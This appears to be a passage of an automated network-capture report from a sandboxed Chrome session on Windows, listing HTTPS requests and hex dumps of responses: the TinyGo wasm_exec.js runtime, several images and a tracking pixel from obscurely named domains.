                                                                                                                                                          2024-06-09 22:41:11 UTC509INData Raw: 33 66 36 34 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 54 68 65 20 47 6f 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2f 2f 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 0a 2f 2f 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 0a 2f 2f 0a 2f 2f 20 54 68 69 73 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 66 6f 72 20 75 73 65 20 62 79 20 74 68 65 20 54 69 6e 79 47 6f 20 63 6f 6d 70 69 6c 65 72 2e 0a 0a 28 28 29 20 3d 3e 20 7b 0a 09 2f 2f 20 4d 61 70 20 6d 75 6c 74 69 70
                                                                                                                                                          Data Ascii: 3f64// Copyright 2018 The Go Authors. All rights reserved.// Use of this source code is governed by a BSD-style// license that can be found in the LICENSE file.//// This file has been modified for use by the TinyGo compiler.(() => {// Map multip
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 77 69 6e 64 6f 77 2e 67 6c 6f 62 61 6c 20 3d 20 77 69 6e 64 6f 77 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 73 65 6c 66 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 73 65 6c 66 2e 67 6c 6f 62 61 6c 20 3d 20 73 65 6c 66 3b 0a 09 7d 20 65 6c 73 65 20 7b 0a 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 65 78 70 6f 72 74 20 47 6f 20 28 6e 65 69 74 68 65 72 20 67 6c 6f 62 61 6c 2c 20 77 69 6e 64 6f 77 20 6e 6f 72 20 73 65 6c 66 20 69 73 20 64 65 66 69 6e 65 64 29 22 29 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 72 65 71 75 69 72 65 20
                                                                                                                                                          Data Ascii: } else if (typeof window !== "undefined") {window.global = window;} else if (typeof self !== "undefined") {self.global = self;} else {throw new Error("cannot export Go (neither global, window nor self is defined)");}if (!global.require
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 2c 0a 09 09 09 66 63 68 6f 77 6e 28 66 64 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 74 61 74 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 79 6e 63 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 6e 75 6c 6c 29 3b 20 7d 2c 0a 09 09 09 66 74 72 75 6e 63 61 74 65 28 66 64 2c 20 6c 65 6e 67 74 68 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 6c 63 68 6f 77 6e 28 70 61 74 68 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c
                                                                                                                                                          Data Ascii: ,fchown(fd, uid, gid, callback) { callback(enosys()); },fstat(fd, callback) { callback(enosys()); },fsync(fd, callback) { callback(null); },ftruncate(fd, length, callback) { callback(enosys()); },lchown(path, uid, gid, callback) { call
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 69 72 28 29 20 7b 20 74 68 72 6f 77 20 65 6e 6f 73 79 73 28 29 3b 20 7d 2c 0a 09 09 7d 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 20 7b 0a 09 09 63 6f 6e 73 74 20 6e 6f 64 65 43 72 79 70 74 6f 20 3d 20 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 3b 0a 09 09 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 20 3d 20 7b 0a 09 09 09 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 62 29 20 7b 0a 09 09 09 09 6e 6f 64 65 43 72 79 70 74 6f 2e 72 61 6e 64 6f 6d 46 69 6c 6c 53 79 6e 63 28 62 29 3b 0a 09 09 09 7d 2c 0a 09 09 7d 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 20 7b 0a 09 09 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3d 20 7b 0a 09 09 09 6e 6f 77 28 29 20 7b 0a 09
                                                                                                                                                          Data Ascii: ir() { throw enosys(); },}}if (!global.crypto) {const nodeCrypto = require("crypto");global.crypto = {getRandomValues(b) {nodeCrypto.randomFillSync(b);},};}if (!global.performance) {global.performance = {now() {
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 09 09 69 66 20 28 21 69 73 4e 61 4e 28 66 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 66 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 73 74 6f 72 65 56 61 6c 75 65 20 3d 20 28 61 64 64 72 2c 20 76 29 20 3d 3e 20 7b 0a 09 09 09 09 63 6f 6e 73 74 20 6e 61 6e 48 65 61 64 20 3d 20 30 78 37 46 46 38 30 30 30 30 3b 0a 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 76 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 0a 09 09 09 09 09 69 66 20 28 69 73 4e 61 4e 28 76 29 29 20 7b 0a 09 09 09 09 09 09 6d 65 6d 28 29
                                                                                                                                                          Data Ascii: if (!isNaN(f)) {return f;}const id = mem().getUint32(addr, true);return this._values[id];}const storeValue = (addr, v) => {const nanHead = 0x7FF80000;if (typeof v === "number") {if (isNaN(v)) {mem()
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 20 22 73 79 6d 62 6f 6c 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 33 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 34 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 20 2b 20 34 2c 20 6e 61 6e 48 65 61 64 20 7c 20 74 79 70 65 46 6c 61 67 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 69 64 2c 20 74 72 75 65 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 6c 6f 61 64 53 6c 69 63 65 20 3d 20 28 61 72 72 61 79 2c 20 6c 65 6e 2c 20 63 61 70 29 20 3d 3e 20 7b 0a 09 09 09 09 72 65
                                                                                                                                                          Data Ascii: "symbol":typeFlag = 3;break;case "function":typeFlag = 4;break;}mem().setUint32(addr + 4, nanHead | typeFlag, true);mem().setUint32(addr, id, true);}const loadSlice = (array, len, cap) => {re
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 69 74 65 20 6c 69 6e 65 0a 09 09 09 09 09 09 09 09 09 09 6c 65 74 20 6c 69 6e 65 20 3d 20 64 65 63 6f 64 65 72 2e 64 65 63 6f 64 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 6f 67 4c 69 6e 65 29 29 3b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 20 3d 20 5b 5d 3b 0a 09 09 09 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6c 69 6e 65 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 2e 70 75 73 68 28 63 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 69 6e 76 61 6c 69 64 20 66 69 6c 65 20 64 65 73 63 72 69
                                                                                                                                                          Data Ascii: ite linelet line = decoder.decode(new Uint8Array(logLine));logLine = [];console.log(line);} else {logLine.push(c);}}}} else {console.error('invalid file descri
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 76 5f 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 2d 2d 3b 0a 09 09 09 09 09 09 69 66 20 28 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 20 3d 3d 3d 20 30 29 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 74 20 76 20 3d 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 73 2e 64 65 6c 65 74 65 28 76 29 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 50 6f 6f 6c 2e 70 75 73 68 28 69 64 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a
                                                                                                                                                          Data Ascii: const id = mem().getUint32(v_addr, true);this._goRefCounts[id]--;if (this._goRefCounts[id] === 0) {const v = this._values[id];this._values[id] = null;this._ids.delete(v);this._idPool.push(id);}},
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 76 61 6c 75 65 53 65 74 49 6e 64 65 78 28 76 20 72 65 66 2c 20 69 20 69 6e 74 2c 20 78 20 72 65 66 29 0a 09 09 09 09 09 22 73 79 73 63 61 6c 6c 2f 6a 73 2e 76 61 6c 75 65 53 65 74 49 6e 64 65 78 22 3a 20 28 76 5f 61 64 64 72 2c 20 69 2c 20 78 5f 61 64 64 72 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 52 65 66 6c 65 63 74 2e 73 65 74 28 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 2c 20 69 2c 20 6c 6f 61 64 56 61 6c 75 65 28 78 5f 61 64 64 72 29 29 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 66 75 6e 63 20 76 61 6c 75 65 43 61 6c 6c 28 76 20 72 65 66 2c 20 6d 20 73 74 72 69 6e 67 2c 20 61 72 67 73 20 5b 5d 72 65 66 29 20 28 72 65 66 2c 20 62 6f 6f 6c 29 0a 09 09 09 09 09 22 73 79 73 63
                                                                                                                                                          Data Ascii: ;},// valueSetIndex(v ref, i int, x ref)"syscall/js.valueSetIndex": (v_addr, i, x_addr) => {Reflect.set(loadValue(v_addr), i, loadValue(x_addr));},// func valueCall(v ref, m string, args []ref) (ref, bool)"sysc
                                                                                                                                                          2024-06-09 22:41:11 UTC1369INData Raw: 73 74 20 76 20 3d 20 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 3b 0a 09 09 09 09 09 09 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 6c 6f 61 64 53 6c 69 63 65 4f 66 56 61 6c 75 65 73 28 61 72 67 73 5f 70 74 72 2c 20 61 72 67 73 5f 6c 65 6e 2c 20 61 72 67 73 5f 63 61 70 29 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 76 2c 20 61 72 67 73 29 29 3b 0a 09 09 09 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 38 28 72 65 74 5f 61 64 64 72 20 2b 20 38 2c 20 31 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 65 72
                                                                                                                                                          Data Ascii: st v = loadValue(v_addr);const args = loadSliceOfValues(args_ptr, args_len, args_cap);try {storeValue(ret_addr, Reflect.construct(v, args));mem().setUint8(ret_addr + 8, 1);} catch (err) {storeValue(ret_addr, er


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          379192.168.2.55015090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC381OUTGET /pc/image-pc/index/312/service/pb_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 7640
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:58 GMT
                                                                                                                                                          ETag: "5d71fe8a-1dd8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[1],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 74b1f7e8b8870c2d62728942682f1a95
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126891
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC7640INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 45 08 06 00 00 00 ed 86 70 a4 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1c ef 49 44 41 54 78 da dd 9c 7b 9c 65 55 75 e7 bf 7b ed 7d ce 7d 56 55 57 37 dd 08 08 c2 90 40 8c 3a c9 47 8d 1f 4d 8c ce 44 a3 f8 89 10 8c 60 f3 10 11 50 23 0a c4 f8 36 13 1d 27 51 c7 4f 12 31 3e 92 8c 28 62 23 cd 43 5e 46 25 c0 48 4c 24 c6 98 98 49 d4 21 0a a8 20 20 cf 7e 57 d5 7d 9d b3 f7 5a f3 c7 39 f7 d6 ad a6 ab 68 13 e6 03 1f 77 7d 76 57 77 d5 bd fb 9e fd db 6b af f5 5b bf bd 76 3b 1e cf 4d 02 e4 4d e8 ce b1 f9 fa
                                                                                                                                                          Data Ascii: PNGIHDRJEpgAMAa cHRMz&u0`:pQ<bKGDIDATx{eUu{}}VUW7@:GMD`P#6'QO1>(b#C^F%HL$I! ~W}Z9hw}vWwk[v;MM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          380192.168.2.55015190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC642OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[7],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,6],EU-GER-frankfurt-GLOBAL1-CACHE14[14],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,11],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d1bac0652917e9146f203f6cf051a129
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC15756INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 2e 16 6f 26 c8 b2 c9 b5 3e 61 ce 77 e7 75 9e 86 c7 0c cf 0c 2e cf 1d 82 44 58 aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e ea 2c d7 80 a5 ac
                                                                                                                                                          Data Ascii: .o&>awu.DX+EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n,
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 4a d1 6a da b6 96 07 11 9d b9 5a 77 30 b8 50 66 ae 36 0d 4f d9 a3 92 93 c9 43 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26 e7 f2 ad 11 89 9e
                                                                                                                                                          Data Ascii: JjZw0Pf6OCPe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 00 ec ab e3 33 3b 83 34 be 23 f5 bd 1b e9 a3 a0 a8 8e 46 be 9a 5d 24 9c 1c 92 d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db b4 6a 6c dd 59 4f
                                                                                                                                                          Data Ascii: 3;4#F]$2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"jlYO
                                                                                                                                                          2024-06-09 22:41:11 UTC10748INData Raw: 97 84 5b 54 78 3b d4 71 40 6b ae b5 14 94 64 6e e8 df 2f 98 7f fa 58 0e 54 16 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b 07 01 24 78 fb 8c
                                                                                                                                                          Data Ascii: [Tx;q@kdn/XT_4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;$x


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          381192.168.2.55014343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC361OUTGET /cc.png?r=2654442886 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC341INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 15125173417007138961
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
